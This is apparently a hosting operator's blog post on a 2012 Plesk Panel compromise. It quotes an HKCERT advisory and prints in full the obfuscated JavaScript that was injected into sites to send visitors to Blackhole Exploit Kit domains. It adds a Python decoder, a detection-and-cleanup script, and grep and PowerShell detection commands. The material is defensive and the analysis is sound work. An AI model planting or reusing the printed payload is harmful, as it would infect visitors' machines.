Unexpectedly, while doing maintenance on the 104 B&B directory site the other day, I found that ESET had raised a trojan-injection warning!
Following that warning to trace which files were infected, I found that some .js files had been injected with abnormal code.


An example of the injected code is as follows:


/*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,192,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,60
6,580,408,485,696,505,240,205,192,210,192,240,720,350,420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,23
4,220,234,545,234,220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,
684,505,582,580,606,345,648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}
/*qhk6sa6g1c*/
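
The sample above hides its real script as an array of numbers and rebuilds it with `String.fromCharCode(w[j]/(5+j%2))`, so every entry at an even index was multiplied by 5 and every entry at an odd index by 6. The following Python helper is an added example for triage, not code from this post or from HKCERT: it undoes that encoding and can pull the `f=[...]` array straight out of an injected block, even when extraction has wrapped the array across lines. `SAMPLE_PREFIX` holds the first 28 values of the array shown above; the function and variable names are my own.

```python
import re

# First 28 entries of the f=[...] array in the sample above; decoding them
# yields the opening of the hidden script.
SAMPLE_PREFIX = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720,
                 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606,
                 570, 240, 205, 738]


def decode(values):
    """Undo the sample's number-to-character encoding.

    The sample rebuilds its payload with
        s += String.fromCharCode(w[j] / (5 + j % 2))
    so entries at even positions are 5x the character code and entries at
    odd positions are 6x.  A value that does not divide cleanly means the
    array is not in this scheme, so fail loudly rather than emit garbage.
    """
    out = []
    for i, v in enumerate(values):
        divisor = 5 + (i % 2)
        if v % divisor:
            raise ValueError(f"value {v} at index {i} is not a multiple of {divisor}")
        out.append(chr(v // divisor))
    return "".join(out)


def extract_array(script_text):
    """Pull the numeric f=[...] array out of an injected script block.

    Whitespace (including line breaks that a copy/paste or page extraction
    inserted in the middle of a number) is removed before splitting.
    """
    m = re.search(r"f=\[([\d,\s]+)\]", script_text)
    if not m:
        raise ValueError("no f=[...] array found")
    digits = re.sub(r"\s", "", m.group(1))
    return [int(x) for x in digits.split(",") if x]


def decode_script(script_text):
    """Convenience wrapper: locate the array in an injected block and decode it."""
    return decode(extract_array(script_text))


if __name__ == "__main__":
    # Prints: function nextRandomNumber(){
    print(decode(SAMPLE_PREFIX))
```

Running `decode_script()` over the whole block from the page reproduces the `nextRandomNumber`/`generatePseudoRandomString` script that HKCERT describes below, which is how the 12-hourly .ru domain pattern was identified. The sample's loop runs exactly 1776 iterations, so an array of a different length is a variant and worth comparing separately.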

It turns out many people have already been hit!!

I looked at many cases but could not figure it out; in short, some piece of software has a vulnerability!!!

Later I wondered whether it was related to PLESK, so I found a relevant topic in its knowledge base


[FIX] Remote vulnerability in Plesk Panel

First try the update, then watch whether the problem recurs.

http://kb.parallels.com/en/113321

For Plesk 9.0 Windows:
http://kb.parallels.com/112303

This fellow says some upload software has a vulnerability:
http://www.udpwork.com/item/7665.html

[Update 2012/09/07]
Confirmed that Plesk has a vulnerability; https://www.hkcert.org/my_url/zh/blog/12071901 describes the same problem:
Security Blog

Parallels Plesk Panel management platform vulnerability leads to large-scale website intrusion attacks

Published: 19 / 07 / 2012
Last updated: 30 / 08 / 2012

Recently a website administrator asked us for help: he found that his website's home page or .js files had been injected with malicious code by hackers, and this code silently redirects visitors to unknown .ru (Russian) websites. Those sites host the well-known "Blackhole Exploit Kit" attack code, which tries to exploit multiple vulnerabilities on the visitor's system, including Java, Adobe Flash Player, Adobe Reader and Windows Help Center (Note 1). If the attack succeeds, it downloads malware onto the affected system. We analysed the malicious code on the compromised sites and found that it belongs to a recent large-scale website intrusion campaign caused by a vulnerability in the Parallels Plesk Panel management platform; the number of affected websites is estimated in the tens of thousands.

Parallels Plesk Panel management platform vulnerability

Parallels Plesk Panel is one of the website management platforms widely used by web hosting companies; more than 250,000 servers worldwide run it. Older versions of the software (before version 11) still store password data unencrypted (in plain text). Starting in late June, hackers became aware of this weakness and combined it with other remote SQL vulnerabilities in the software, allowing them to steal the account passwords of every website on an entire server. Since July, hackers have been selling attack programs targeting this vulnerability on some online forums (Note 2).

Figure 1: Hackers exploit the Parallels Plesk Panel vulnerability to steal website account passwords



Hackers inject malicious code into the websites of affected accounts

After obtaining a website's account password, the hacker can log in to the Parallels Plesk Panel management platform and control every website on the server, including changing or replacing file contents. In the log records you may find hackers coming from several IP addresses, using the File Manager built into Parallels Plesk Panel to log in to multiple websites on the server within a short period and upload or edit files.

Figure 2: Sample log records

At the very end of the home page or .js files of affected websites, you will find the following specially crafted malicious code, wrapped at the beginning and end by the two comments /*km0ae9gr6m*/ and /*qhk6sa6g1c*/.

Figure 3: Sample malicious code (image source: unmaskparasites.com)

After decoding (Note 3), we found that this code generates, based on the date and time, a new URL on a random .ru domain every 12 hours:

http:// <隨機產生域名>.ru /runforestrun?sid=cx

Security researchers have confirmed that the hackers registered these domains in advance for illegal activity. When a user's computer browses a website carrying the injected code, it connects to the above .ru websites without the user noticing. Those sites contain the "Blackhole Exploit Kit" attack code, which may infect the user's computer with malware.

How to protect yourself

According to data from the security company Sucuri (Note 4), more than 50,000 websites are estimated to have been compromised, and the number is growing daily. To protect website owners and individual users from this attack, we have the following recommendations:

Steps for website administrators

If the website is hosted on a Linux system, use the "grep" command to test whether web pages have been injected with the malicious code:

cd <vhost location>
grep -rl --include=*.{php,js,html,htm} "km0ae9gr6m" *

If the website is hosted on a Windows system, use the following "PowerShell" command to test whether web pages have been injected with the malicious code:

cd <vhost location>
get-childitem .\ -include *.asp,*.aspx,*.php,*.js,*.html,*.htm -rec | select-string -pattern "km0ae9gr6m"

If your web pages have been injected with malicious code, remove the malicious code from the pages manually. Then contact your web hosting company and follow the recommendations under "Steps for Parallels Plesk Panel administrators" below.
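
The grep and PowerShell one-liners above find files carrying the marker; removing the block by hand from dozens of vhosts is tedious and error-prone. As an added example that is not part of the HKCERT advisory or this post, the Python script below does both steps for the documented signature: it walks a vhost directory, reports web files containing the `km0ae9gr6m` marker, and strips every `/*km0ae9gr6m*/ ... /*qhk6sa6g1c*/` block in place. The directory tree it builds in `build_sample_tree()` is constructed test data; the function names and the file-extension list are my own choices, extended with `.asp`/`.aspx` as in the PowerShell command.

```python
import os
import re
import tempfile

MARKER_OPEN = "km0ae9gr6m"
MARKER_CLOSE = "qhk6sa6g1c"
WEB_EXTS = (".php", ".js", ".html", ".htm", ".asp", ".aspx")

# Whole injected block, opening comment tag to closing one, across newlines.
INJECTED_BLOCK = re.compile(
    r"/\*" + MARKER_OPEN + r"\*/.*?/\*" + MARKER_CLOSE + r"\*/", re.DOTALL)


def find_infected(root, marker=MARKER_OPEN, exts=WEB_EXTS):
    """Walk `root`; return sorted relative paths of web files containing `marker`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:  # binary read: odd encodings must not abort the scan
                if marker.encode() in fh.read():
                    hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def strip_injected_block(text):
    """Remove every marker-delimited block; return (cleaned text, blocks removed)."""
    return INJECTED_BLOCK.subn("", text)


def clean_tree(root):
    """Strip injected blocks in place; return {relative path: blocks removed}."""
    removed = {}
    for rel in find_infected(root):
        path = os.path.join(root, rel)
        with open(path, encoding="utf-8", errors="surrogateescape") as fh:
            text = fh.read()
        clean, n = strip_injected_block(text)
        if n:
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(clean)
            removed[rel] = n
    return removed


def build_sample_tree():
    """Create a throwaway vhost directory with constructed sample files."""
    root = tempfile.mkdtemp(prefix="vhost_")
    # Constructed stand-in for the injected block: same comment tags, harmless body.
    injected = "/*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}/*qhk6sa6g1c*/"
    files = {
        "js/app.js": "function ok(){}\n" + injected + "\n",
        "index.html": "<html><body>clean page</body></html>\n",
        "blog/post.php": "<?php echo 1; ?>\n" + injected,
        "notes.txt": "mentions km0ae9gr6m but is not a served web file\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("infected:", find_infected(root))
    print("cleaned:", clean_tree(root))
    print("after cleanup:", find_infected(root))
```

Cleaning the files only removes the payload, not the access the attacker used to plant it: as the advisory says next, the Plesk patch, the password reset and the session purge still have to follow, otherwise the File Manager uploads simply resume.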

Steps for Parallels Plesk Panel administrators

If you use a Parallels Plesk Panel version before 11 and have not installed the "113321" patch, refer to the solution provided by Parallels (Note 5).
  1. Install the "113321" patch (http://kb.parallels.com/113321)
  2. Reset all account passwords (http://kb.parallels.com/en/113391); e-mail passwords may be exempted
  3. Remove the sessions records from the psa database
    mysql> delete from sessions;
  4. Remove the malicious code from the affected files on the server (http://forum.parallels.com/showpost.php?p=630228&postcount=24)

Steps for individual users

  1. Install security software and keep it updated
  2. Keep the software on your system up to date

Posted by NetPC虛擬主機 on Pixnet.